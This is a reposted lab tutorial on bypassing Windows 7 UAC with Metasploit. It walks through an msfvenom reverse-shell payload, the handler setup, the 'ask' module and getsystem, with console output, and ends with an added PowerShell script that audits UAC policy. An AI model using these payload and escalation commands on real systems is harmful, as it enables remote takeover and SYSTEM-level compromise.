Windows UAC privilege escalation

Preparation

  Target machine    Attacker machine
  --------------    ----------------
  win7              kali
  192.168.43.254    192.168.43.113

Here I only demonstrate the attack steps. If any command is unfamiliar, see my other articles, where I keep notes specifically on commands, or look it up yourself.

What UAC is

UAC (User Account Control) is a technology Microsoft introduced in Windows Vista to improve system security. It requires the user to grant permission or enter an administrator password before performing an operation that may affect how the computer runs, or that changes settings affecting other users.

In other words, once the user allows an application to pass the UAC check, that program holds administrator rights. If we can somehow hijack a program that has passed the user's UAC check, our own program gains the same rights, and that is the privilege escalation.

Getting a shell

Since this is a demonstration, we simply generate a payload with msf to obtain a shell:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.113 LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -f exe > uac.exe

Set up the listener:

use exploit/multi/handler 

Set the payload:

set payload windows/meterpreter/reverse_tcp

Set the listening IP and port:

set lhost 192.168.43.113
set lport 6666

Then run; on the Win7 machine, open uac.exe, and Kali has a shell:

msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.43.113:6666 
[*] Sending stage (179779 bytes) to 192.168.43.254
[*] Meterpreter session 1 opened (192.168.43.113:6666 -> 192.168.43.254:50063) at 2020-10-05 22:02:08 +0800

meterpreter > 

We can see the account is an administrator:

meterpreter > getuid
Server username: LS--20200725FKO\Administrator

Then getsystem fails to escalate: the account is an administrator, but under UAC the process runs with the filtered, non-elevated token. So we background the session for now:

meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > se
search    services  sessions  set       setg      
msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  2         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:50080 (192.168.43.254)

UAC privilege escalation

After backgrounding the session, use the following module:

use exploit/windows/local/ask

Look at the module information, then set the options we need:

msf5 exploit(windows/local/ask) > info

       Name: Windows Escalate UAC Execute RunAs
     Module: exploit/windows/local/ask
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-01-03

Provided by:
  mubix <mubix@hak5.org>
  b00stfr3ak

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILENAME                    no        File name on disk
  PATH                        no        Location on disk, %TEMP% used if not set
  SESSION                     yes       The session to run this module on.
  TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)

Payload information:

Description:
  This module will attempt to elevate execution level using the 
  ShellExecute undocumented RunAs flag to bypass low UAC settings.

From the above, we know the session must be set:

msf5 exploit(windows/local/ask) > set session 2
session => 2

The other two options are not required and may be set or left alone. Then run:

msf5 exploit(windows/local/ask) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  5         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)
  6         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)

We can see there are now two sessions, both showing Administrator; the new one, session 6, is the one opened after running the module.

msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > 

We interact with session 6:

meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

We now have SYSTEM privileges.

  Module name                                       My understanding
  -----------                                       ----------------
  exploit/windows/local/ask                         requires a click (user must accept the prompt)
  exploit/windows/local/bypassuac                   no click required
  exploit/windows/local/ms14_058_track_popup_menu
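The module description above says it works against "low UAC settings", and the table distinguishes the module that needs a user click from the ones that do not. Whether a prompt appears at all is decided by the machine's UAC policy, so a defender's first check is that policy. The following PowerShell audit is an added example, not part of the original post or of Metasploit; the registry path and value names are the standard Windows UAC policy settings, and the "Always notify" baseline it compares against is this example's own assumption.

```powershell
# Added example (not from the original post): audit the local UAC policy
# values that decide whether an elevation prompt is shown and where.
# Path and value names are the standard Windows UAC policy settings;
# treating 2/1/1 as the desired baseline is an assumption of this example.
$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPolicy {
    # Read the three relevant values; a value that is absent comes back as $null.
    $p = Get-ItemProperty -Path $PolicyKey -ErrorAction Stop
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
    }
}

function Test-UacPolicy {
    # Return one finding string per weak setting; an empty list means the
    # policy matches the "Always notify on the secure desktop" baseline.
    param([Parameter(Mandatory)] $Policy)
    $findings = @()

    if ($Policy.EnableLUA -ne 1) {
        $findings += 'EnableLUA is not 1: UAC is disabled, admin logons run fully elevated with no prompt.'
    }

    switch ($Policy.ConsentPromptBehaviorAdmin) {
        0 { $findings += 'ConsentPromptBehaviorAdmin=0: elevation is silent, a RunAs request (as the ask module issues) never shows a prompt.' }
        2 { }  # Prompt for consent on the secure desktop: the "Always notify" level
        5 { $findings += 'ConsentPromptBehaviorAdmin=5 (default): signed Windows binaries auto-elevate, which the no-click bypass modules rely on; consider 2 (Always notify).' }
        default { $findings += "ConsentPromptBehaviorAdmin=$($Policy.ConsentPromptBehaviorAdmin): weaker than Always notify (2)." }
    }

    if ($Policy.PromptOnSecureDesktop -ne 1) {
        $findings += 'PromptOnSecureDesktop is not 1: the consent dialog is drawn on the normal desktop, where other user processes can interact with it.'
    }
    return $findings
}

$policy = Get-UacPolicy
$policy | Format-List
$result = @(Test-UacPolicy -Policy $policy)
if ($result.Count -eq 0) {
    'UAC policy matches the Always-notify baseline.'
} else {
    $result | ForEach-Object { "WEAK: $_" }
}
```

Run it in an elevated or non-elevated PowerShell on the target build; reading these values needs no special rights. A result with no findings means every elevation, including the RunAs request that the ask module makes, produces a consent dialog on the secure desktop, so the escalation shown above depends entirely on the user clicking Yes.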


Reposted from blog.csdn.net/p_utao/article/details/109711206